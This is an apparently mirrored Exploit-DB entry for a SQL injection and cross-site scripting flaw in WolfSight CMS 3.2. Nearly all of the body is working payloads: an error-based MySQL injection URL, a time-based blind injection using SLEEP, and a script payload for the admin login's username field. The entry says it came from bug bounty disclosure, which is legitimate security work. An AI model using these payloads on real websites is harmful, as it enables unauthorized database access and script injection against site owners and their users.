WolfSight CMS 3.2 – SQL Injection

  • 作者: Berk Dusunur
    日期: 2018-07-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44997/
  • # Exploit Title: WolfSight CMS 3.2 - SQL Injection
    # Google Dork: N/A
    # Date: 2018-07-10
    # Exploit Author: Berk Dusunur & Zehra Karabiber
    # Vendor Homepage: http://www.wolfsight.com
    # Software Link: http://www.wolfsight.com
    # Version: v3.2
    # Tested on: Parrot OS / WinApp Server
    # CVE : N/A
    
    # PoC Sql Injection
    # Parameter: #1* (URI)
    # Type: error-based
    # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    # Payload: 
    
    http://www.ip/page1-%bf%bf"-page1/' AND (SELECT 7988 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT(ELT(7988=7988,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'WpDn'='WpDn
    
    # Type: AND/OR time-based blind
    # Title: MySQL >= 5.0.12 OR time-based blind
    # Payload: 
    
    http://www.ip/page1-%bf%bf"-page1/'OR SLEEP(5) AND 'kLLx'='kLLx
    
    # PoC Cross-Site Scripting
    # http://ip/admin/login.php
    # Username
    
    <IMG SRC=”javascript:alert(‘EZK’);”>
    
    # This vulnerability was identified during bug bounty